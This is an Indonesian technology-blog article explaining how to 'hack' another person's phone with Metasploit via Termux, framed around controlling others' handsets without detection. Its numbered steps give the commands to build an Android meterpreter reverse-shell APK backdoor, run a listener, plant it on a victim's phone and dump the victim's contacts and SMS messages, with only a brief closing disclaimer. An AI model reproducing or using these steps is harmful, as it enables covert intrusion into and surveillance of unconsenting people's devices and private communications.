Cara Hack HP Dengan Metasploit

Cara Hack HP Dengan Metasploit

Bagi Anda yang sedang mencari cara hack hp dengan metasploit, Anda telah menemukan artikel yang tepat. Banyak orang ingin tahu bagaimana cara mengendalikan handphone orang lain tanpa terdeteksi, dan ini bisa dilakukan dengan menggunakan aplikasi Termux.

Meskipun banyak yang ragu karena mereka mengira bahwa hacking akan melibatkan pengkodean yang rumit, sebenarnya Anda bisa melakukan penyadapan tanpa harus menguasai koding. Salah satu cara yang bisa dilakukan untuk menyadap perangkat handphone orang lain adalah dengan menggunakan aplikasi Metasploit.

Untuk yang belum tahu, aplikasi Metasploit adalah proyek keamanan komputer yang menyediakan informasi tentang kerentanan keamanan, membantu dalam melakukan pengujian penetrasi, dan pengembangan signature IDS. Software security ini sering digunakan untuk menguji keamanan suatu sistem dengan memanfaatkan kelemahan perangkat lunak.

Metasploit juga memiliki proyek sub yang dikembangkan oleh Rapid7, yang dilakukan dengan cara mengeksploitasi kelemahan software dari suatu sistem. Aplikasi ini sudah berhasil mengembangkan sistem yang memberikan informasi tentang keamanan komputer, serta Source Code yang memungkinkan akses ke jaringan.

Proyek paling terkenal dari Metasploit adalah Metasploit Framework. Awalnya diciptakan oleh HD Moore pada tahun 2003, perangkat lunak ini diakuisisi oleh perusahaan keamanan jaringan Rapid7 pada tahun 2009.

Sebelum kita membahas cara hack hp dengan metasploit, pastikan terlebih dahulu bahwa sistem target rentan terhadap metasploit. Apabila rentan, proses hack pun menjadi lebih mudah dan tingkat keberhasilannya lebih tinggi.

Untuk menjalankan proses hack dengan metasploit, Anda juga perlu mendownload aplikasi Termux. Termux merupakan aplikasi emulator terminal untuk Android dan Linux Environment, yang berjalan tanpa memerlukan rooting atau pengaturan khusus lainnya. Aplikasi ini memungkinkan Anda menginstall Penetration Testing Tools atau tool hacking seperti Metasploit dan net hunter pada perangkat Android.

Setelah semua persyaratan disiapkan, Anda bisa mengikuti langkah-langkah berikut untuk melakukan pembobolan perangkat handphone orang lain dengan metasploit:

1. Download aplikasi Termux melalui link yang sudah disediakan.
2. Install aplikasi Termux di perangkat Anda.
3. Lakukan pengecekan IP dengan mengetikkan “ifconfig” untuk mendapatkan IP Anda.
4. Buat Backdoor dengan perintah “msfvnom -p android/meterpreter/reverse_tcp LHOST=(IP Anda) LPORT=4444 R> andro.apk”, dan berikan hak akses menggunakan perintah “chmod 777 andro.apk”.
5. Buka aplikasi Metasploit dengan perintah “msfconsole”.
6. Aktifkan Exploit multi handler dengan memasukkan perintah “use multi/handler” dan aktifkan payload dengan perintah “set payload android/meterpreter/reverse_tcp”.
7. Set IP Anda dengan perintah “set LHOST (IP Anda)”.
8. Set port dengan perintah “set LPORT 4444”.
9. Jalankan exploit dengan perintah “exploit”.
10. Install backdoor tadi ke dalam perangkat handphone korban.
11. Gunakan perintah “help” untuk mengetahui perintah apa saja yang bisa digunakan.
12. Untuk melihat isi kontak handphone korban, gunakan perintah “dump_contacts”.
13. Terakhir, gunakan perintah “dump_sms” untuk melihat pesan dalam handphone korban.

Dengan langkah-langkah di atas, Anda bisa melakukan pembobolan perangkat handphone orang lain dengan metasploit. Namun, kami tegaskan untuk tidak menggunakan cara ini untuk tindakan yang merugikan orang lain.

Jika Anda merasa pembahasan di atas bermanfaat, jangan ragu untuk membagikannya ke teman atau kerabat Anda. Itulah cara hack hp dengan metasploit yang bisa Anda terapkan dengan mudah. Semoga artikel ini bermanfaat bagi Anda.

Android62 adalah salah satu situs yang memiliki dedikasi tinggi dalam menyajikan berita dan informasi terbaru seputar teknologi dan aplikasi. Dengan pengalamannya yang panjang dalam dunia blogging, Android62 memiliki kemampuan untuk memahami dan menyampaikan informasi teknologi dengan cara yang menarik dan mudah dimengerti oleh pembaca.
Back to top button